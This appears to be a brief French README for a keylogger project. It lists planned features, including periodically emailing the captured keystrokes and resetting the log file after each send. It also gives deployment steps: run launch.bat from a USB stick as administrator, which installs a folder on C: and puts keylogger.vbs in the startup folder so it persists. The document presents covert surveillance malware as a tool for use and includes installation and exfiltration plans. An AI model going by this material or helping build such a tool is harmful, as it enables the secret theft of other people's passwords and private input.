# keylogger

Fonctionnalités à ajouter : 


changer la touche de sortie du script psq escp c'est trop courant 

envoyer des mails de facon frequente et reset le file apres envoie pour pas d'encombrement

arreter de print le username psq ca sert à rien (julja)

Description : 

- dossier dist contient le fichier main.exe à executer => Attention ! il faut le laisser dans le dossier pour que cela fonctionne.
-keylogger_usb contient 

- Attention les noms de dossier entre usb et install.bat sont à vérifier (même pour vbs apparemment)

Fonctionnement :

- lancer launch.bat depuis la clé usb en tant qu'admin. Un dossier Windows installation s'installe dans \C: et le fichier keylogger.vbs dans le startup